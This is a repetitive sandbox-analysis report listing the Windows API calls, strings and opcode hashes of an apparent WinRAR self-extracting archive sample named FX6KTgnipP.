                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                                                                                                                                                            • String ID: rtmp
                                                                                                                                                                            • API String ID: 2388273531-870060881
                                                                                                                                                                            • Opcode ID: 54d7d21a4e05bce528b53d44b9072c865b3b6707cd9a19b4591887759c1a81bc
                                                                                                                                                                            • Instruction ID: 220d9c78d84a9c543a6e8639817c685a36796f28d78cd27680c077101df3bb4b
                                                                                                                                                                            • Opcode Fuzzy Hash: 54d7d21a4e05bce528b53d44b9072c865b3b6707cd9a19b4591887759c1a81bc
                                                                                                                                                                            • Instruction Fuzzy Hash: FBB15770D20228DACF28DFA4CC89BDDBBB9BF15305F444099E449A7251DB309BA9CF60
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3__wcslen
                                                                                                                                                                            • String ID: .rar$exe$rar$sfx
                                                                                                                                                                            • API String ID: 3251556500-630704357
                                                                                                                                                                            • Opcode ID: 987217874ae30a85bd4ea1390474a5518c4e8971631e1719f3dd7e7740960db2
                                                                                                                                                                            • Instruction ID: e1a20a40ce093577d39afebd19af829e3ed4273cf530089f46c2b0fa946d91d6
                                                                                                                                                                            • Opcode Fuzzy Hash: 987217874ae30a85bd4ea1390474a5518c4e8971631e1719f3dd7e7740960db2
                                                                                                                                                                            • Instruction Fuzzy Hash: 3871E630A21710DBCB21DF68C941BADB7B8AF59711F20051EFC819B2D1DB7159BACB58
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0025F1F5
                                                                                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 0025F224
                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0025F2BC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ObjectRelease
                                                                                                                                                                            • String ID: )K&$DK&$NK&$lK&$vK&
                                                                                                                                                                            • API String ID: 1429681911-3736163604
                                                                                                                                                                            • Opcode ID: fa4f56f825c663e0363e81abcdf4279f44be3574fd4f0b743d7726568b1dc21c
                                                                                                                                                                            • Instruction ID: bb0122a2754e6e6d32acdf5ea7214391a99cff445e21da83d6aa7e64a3774c83
                                                                                                                                                                            • Opcode Fuzzy Hash: fa4f56f825c663e0363e81abcdf4279f44be3574fd4f0b743d7726568b1dc21c
                                                                                                                                                                            • Instruction Fuzzy Hash: D721E67211C314AFD7019FA1EC4CE6BBFA9FB89351F04092AFA4592220D63199658B62
                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,002504AB,002504AD,00000000,00000000,6294DA82,00000001,00000000,00000000,?,0025038C,?,00000004,002504AB,ROOT\CIMV2), ref: 00265459
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,002504AB,?,00000000,00000000,?,?,0025038C,?,00000004,002504AB), ref: 002654D4
                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 002654DF
                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 00265508
                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 00265512
                                                                                                                                                                            • GetLastError.KERNEL32(80070057,6294DA82,00000001,00000000,00000000,?,0025038C,?,00000004,002504AB,ROOT\CIMV2), ref: 00265517
                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 0026552A
                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,0025038C,?,00000004,002504AB,ROOT\CIMV2), ref: 00265540
                                                                                                                                                                            • _com_issue_error.COMSUPP ref: 00265553
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1353541977-0
                                                                                                                                                                            • Opcode ID: 845f52954da7e4acada8a13db1980adad50ae47c48e6b1494553e2d4974c8519
                                                                                                                                                                            • Instruction ID: e77b2c3a9a38d60add9af9fa2f2bd9281cd9a034096295b2f8f2bffb04ee12cd
                                                                                                                                                                            • Opcode Fuzzy Hash: 845f52954da7e4acada8a13db1980adad50ae47c48e6b1494553e2d4974c8519
                                                                                                                                                                            • Instruction Fuzzy Hash: C5413B71A20625EBCB109F68DC49BAEB7A8EF48710F504269F40AD7240DB3498E0CBA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00250470
                                                                                                                                                                              • Part of subcall function 00250360: __EH_prolog3.LIBCMT ref: 00250367
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 002505FA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3$ClearVariant
                                                                                                                                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                                            • API String ID: 4196654922-3505469590
                                                                                                                                                                            • Opcode ID: 6d8d0949ca62ef17f79e8ee39ce77a0f644818f35981523ba1f88881990a4621
                                                                                                                                                                            • Instruction ID: e58082171208eba4de17a5f73a7a849341e9e0e401659c0254447cebaf4b7790
                                                                                                                                                                            • Opcode Fuzzy Hash: 6d8d0949ca62ef17f79e8ee39ce77a0f644818f35981523ba1f88881990a4621
                                                                                                                                                                            • Instruction Fuzzy Hash: 43615970A20219AFDB14DFA4DC99AAEB7B8FF48311B14405CF906A72A0CB30AD15CF64
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_wcslen
                                                                                                                                                                            • String ID: $</p>$</style>$<br>$<style>
                                                                                                                                                                            • API String ID: 3746244732-3393513139
                                                                                                                                                                            • Opcode ID: aa737f04c7938cdd2c01021793750f255c5228ae67663765433c24a29e519460
                                                                                                                                                                            • Instruction ID: 73b4eb9a022bf7d37b4514c5111b4f730406bab9d2ba90f71f06c78961e7b6e7
                                                                                                                                                                            • Opcode Fuzzy Hash: aa737f04c7938cdd2c01021793750f255c5228ae67663765433c24a29e519460
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F51F835B3071356DF389E24881177A72B5AF64743F568019ED89AB2C0EB758FB88398
APIs
• __EH_prolog3_GS.LIBCMT ref: 0025E26C
• ShowWindow.USER32(?,00000000,00000038), ref: 0025E294
• GetWindowRect.USER32(?,?), ref: 0025E2D8
• ShowWindow.USER32(?,00000005,?,00000000), ref: 0025E373
• ShowWindow.USER32(00000000,00000005), ref: 0025E394
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: Window$Show$H_prolog3_Rect
• String ID: RarHtmlClassName$gI&
• API String ID: 950582801-3320532055
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00264DDA,00264D3D,00264FDE), ref: 00264D76
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00264D8C
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00264DA1
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive$p])
• API String ID: 667068680-4009524389
APIs
• __aulldiv.LIBCMT ref: 0025783D
  • Part of subcall function 0025067E: GetVersionExW.KERNEL32(?), ref: 002506AF
• FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00257860
• FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00257872
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00257883
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00257893
• SystemTimeToFileTime.KERNEL32(?,?), ref: 002578A3
• FileTimeToSystemTime.KERNEL32(?,?,?), ref: 002578DE
• __aullrem.LIBCMT ref: 00257984
Similarity
• API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
• String ID:
• API String ID: 1247370737-0
APIs
• GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00262B66
  • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
  • Part of subcall function 00250BF3: _wcslen.LIBCMT ref: 00250C03
• EndDialog.USER32(?,00000001), ref: 00262EDA
Strings
Similarity
• API ID: _wcslen$DialogPathTemp
• String ID: $@set:user$\S)$\S)
• API String ID: 2172748170-3392452889
APIs
• GetDlgItem.USER32(?,00000066), ref: 002626A9
• SendMessageW.USER32(00000000,00000143,00000000,00295380), ref: 002626D6
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00262702
• __EH_prolog3_GS.LIBCMT ref: 002634F2
Strings
Similarity
• API ID: MessageSend$H_prolog3_Item
• String ID: @U=u$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
• API String ID: 4098331016-3965713946
APIs
• __EH_prolog3_GS.LIBCMT ref: 00250E50
• GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00250E85
• GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00250EC4
• _wcslen.LIBCMT ref: 00250ED4
• GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 00250F51
• GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00250F93
• _wcslen.LIBCMT ref: 00250FA3
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FullNamePath$_wcslen$H_prolog3_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 840513527-0
                                                                                                                                                                            • Opcode ID: 27c6c4aae17e794a5113778a6a274e671e849093ab1c8ccf50a2a7ce52641dfe
                                                                                                                                                                            • Instruction ID: 80ec11ac32e16c6cdaea28f958cab7f098eb4a767d20abf63bb95ee5cb6d38c4
                                                                                                                                                                            • Opcode Fuzzy Hash: 27c6c4aae17e794a5113778a6a274e671e849093ab1c8ccf50a2a7ce52641dfe
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A617E71D20249ABDF14DFA8DD85EEEB7B9AF84711F14011AF810E7280DB7499A8CF64
APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,002769AE,?,00000000,?,00000000,00000000), ref: 0027627B
• __fassign.LIBCMT ref: 002762F6
• __fassign.LIBCMT ref: 00276311
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00276337
• WriteFile.KERNEL32(?,?,00000000,002769AE,00000000,?,?,?,?,?,?,?,?,?,002769AE,?), ref: 00276356
• WriteFile.KERNEL32(?,?,00000001,002769AE,00000000,?,?,?,?,?,?,?,?,?,002769AE,?), ref: 0027638F
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: bc70523764d91f9fa0c015aa169a9d18c8cb274c5ff0a4dcffb8af389b1fc08e
• Instruction ID: 3713b7ec650486c608b01e1df0e573b206835ff68289fa60f662cdfd32ca664d
• Opcode Fuzzy Hash: bc70523764d91f9fa0c015aa169a9d18c8cb274c5ff0a4dcffb8af389b1fc08e
• Instruction Fuzzy Hash: 2A51D570A10649DFDB10CFA8D889AEEBBF8EF09710F14815EF95AE7291D7709950CB60
APIs
• _ValidateLocalCookies.LIBCMT ref: 002693F7
• ___except_validate_context_record.LIBVCRUNTIME ref: 002693FF
• _ValidateLocalCookies.LIBCMT ref: 00269488
• __IsNonwritableInCurrentImage.LIBCMT ref: 002694B3
• _ValidateLocalCookies.LIBCMT ref: 00269508
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 7eca8a5da6930ac67aaa08578683e3e85a7d0556d795e625f494416444ddc4b9
• Instruction ID: 5a11f57fcc44d5fe5f4e02928d460b515dc41c626a7062f40535ae5b39f65b10
• Opcode Fuzzy Hash: 7eca8a5da6930ac67aaa08578683e3e85a7d0556d795e625f494416444ddc4b9
• Instruction Fuzzy Hash: EA417734A202099FCF10DF68C885A9EBBB9BF45314F148155E8195B392DF31E9E6CF91
APIs
  • Part of subcall function 00273518: _free.LIBCMT ref: 00273541
• _free.LIBCMT ref: 002735A2
  • Part of subcall function 002703D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?), ref: 002703EA
  • Part of subcall function 002703D4: GetLastError.KERNEL32(?,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?,?), ref: 002703FC
• _free.LIBCMT ref: 002735AD
• _free.LIBCMT ref: 002735B8
• _free.LIBCMT ref: 0027360C
• _free.LIBCMT ref: 00273617
• _free.LIBCMT ref: 00273622
• _free.LIBCMT ref: 0027362D
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
• Instruction ID: e748978d25cfeb189ab3f2a23c1f4399e31034cc988601b4348ad04b02509b24
• Opcode Fuzzy Hash: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
• Instruction Fuzzy Hash: 1C11C971560B04FBE630FBB1CC46FCB779CAF08700F808855B29DA6152DAB5A6299B91
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0026C5A2,0026C5A2,?,?,?,0027185A,00000001,00000001,C5E85006), ref: 00271663
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0027185A,00000001,00000001,C5E85006,?,?,?), ref: 002716E9
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002717E3
• __freea.LIBCMT ref: 002717F0
  • Part of subcall function 0027040E: RtlAllocateHeap.NTDLL(00000000,0026535E,?,?,00266C16,?,?,?,?,?,00265269,0026535E,?,?,?,?), ref: 00270440
• __freea.LIBCMT ref: 002717F9
• __freea.LIBCMT ref: 0027181E
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: eccf0553085d504c067f55701d4ee78f01341a8b5ddf955a69ceadaac86cc933
• Instruction ID: a07d285e64d3bb5a295091d6c10345ce5d5c3ec0d0e58203e6386b28d3d88c9e
• Opcode Fuzzy Hash: eccf0553085d504c067f55701d4ee78f01341a8b5ddf955a69ceadaac86cc933
• Instruction Fuzzy Hash: F351A872620217ABEB294F68CC45EBB77A9EF44750F158229FC0CD6140DB74DC75CA50
APIs
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 00257B06
  • Part of subcall function 0025067E: GetVersionExW.KERNEL32(?), ref: 002506AF
• LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 00257B2A
• FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00257B44
• TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 00257B57
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00257B67
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00257B77
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
• Opcode ID: 9cbcca2daad3e6278d1751e7732330a6282710092dd9c2bb60feafcaca32d437
• Instruction ID: 9b4f2bb0a25a253584c82137b4642b67c70a6a7c54e297a00be29786aa8f4d81
• Opcode Fuzzy Hash: 9cbcca2daad3e6278d1751e7732330a6282710092dd9c2bb60feafcaca32d437
• Instruction Fuzzy Hash: 834138761183159FC704DFA8D8849ABB7E8FF98714F44492EF999C7210E730D948CBAA
APIs
• FileTimeToSystemTime.KERNEL32(?,?,6294DA82,?,?,?,?,0027AA27,000000FF), ref: 0025F38A
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,0027AA27,000000FF), ref: 0025F399
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,0027AA27,000000FF), ref: 0025F3A7
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,0027AA27,000000FF), ref: 0025F3B5
• GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,0027AA27,000000FF), ref: 0025F3D0
• GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,0027AA27,000000FF), ref: 0025F3FA
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: Time$System$File$Format$DateLocalSpecific
• String ID:
• API String ID: 909090443-0
APIs
• _wcslen.LIBCMT ref: 002631A4
  • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
• __EH_prolog3_GS.LIBCMT ref: 002634F2
Strings
Similarity
• API ID: _wcslen$H_prolog3_
• String ID: .lnk$0$lnk$S)
• API String ID: 2000020936-2631399325
APIs
• GetLastError.KERNEL32(?,?,00269771,002696CC,00266A64), ref: 00269788
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00269796
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002697AF
• SetLastError.KERNEL32(00000000,00269771,002696CC,00266A64), ref: 00269801
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetLastError.KERNEL32(?,?,0026B581,?,0028E088,?,0026AE80,?,0028E088,?,00000007), ref: 00270009
• _free.LIBCMT ref: 0027003C
• _free.LIBCMT ref: 00270064
• SetLastError.KERNEL32(00000000,0028E088,?,00000007), ref: 00270071
• SetLastError.KERNEL32(00000000,0028E088,?,00000007), ref: 0027007D
• _abort.LIBCMT ref: 00270083
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
APIs
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 00263FDB
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00263FF5
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00264006
• TranslateMessage.USER32(?), ref: 00264010
• DispatchMessageW.USER32(?), ref: 0026401A
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 00264025
Similarity
• API ID: Message$ObjectSingleWait$DispatchPeekTranslate
• String ID:
• API String ID: 2148572870-0
APIs
• __EH_prolog3_GS.LIBCMT ref: 0024A307
• GetLastError.KERNEL32(00000054,?,?,?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049), ref: 0024A427
  • Part of subcall function 0024AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 0024AC2E
  • Part of subcall function 0024AC11: GetLastError.KERNEL32 ref: 0024AC72
  • Part of subcall function 0024AC11: CloseHandle.KERNEL32(?), ref: 0024AC81
Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                                                                                                                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege$K&
                                                                                                                                                                            • API String ID: 2235100918-1226173768
                                                                                                                                                                            • Opcode ID: cc778be26e293ded0f17a75b7e1cdaf81b5dbacd6808c72ed9435fec85c2d80f
